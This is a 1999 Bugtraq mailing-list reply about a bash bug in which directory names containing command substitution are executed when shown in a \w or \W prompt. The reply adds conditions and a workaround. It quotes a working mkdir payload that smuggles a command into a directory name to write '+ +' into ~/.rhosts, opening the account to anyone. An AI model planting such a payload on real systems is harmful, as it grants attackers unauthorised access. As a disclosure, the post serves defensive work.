[10314] in bugtraq
Re: Bash Bug
daemon@ATHENA.MIT.EDU (Andy Church)
Thu Apr 22 13:27:32 1999
Date: Wed, 21 Apr 1999 20:39:48 EDT
Reply-To: Andy Church <achurch@DRAGONFIRE.NET>
From: Andy Church <achurch@DRAGONFIRE.NET>
X-To: shadow@OPERATOR.ORG
To: BUGTRAQ@NETSPACE.ORG
>Figured while everyone was working with bash, I might as well make this
>one public(I apologize if this is old news, apparently it hasnt been fixed
>if so).
>
>If a user creates a directory with a command like
>
>mkdir "\ `echo -e \ "echo + +> ~\57.rhosts\ " > x; source x; rm -f \x\ ` "
>
>and someone cd's into said directory, either by accident, or whatever,
>then it will cause it to actually execute.
Just to clarify, this only happens if PS1 (the bash prompt) contains
\w or \W _and_ a prompt is displayed containing the bogus directory name.
This means unattended shell scripts are safe. As a workaround, use `pwd`
in place of \w.
Tested with bash 1.14 (it's the only one I have handy).
--Andy Church
achurch@dragonfire.net
http://achurch.dragonfire.net/
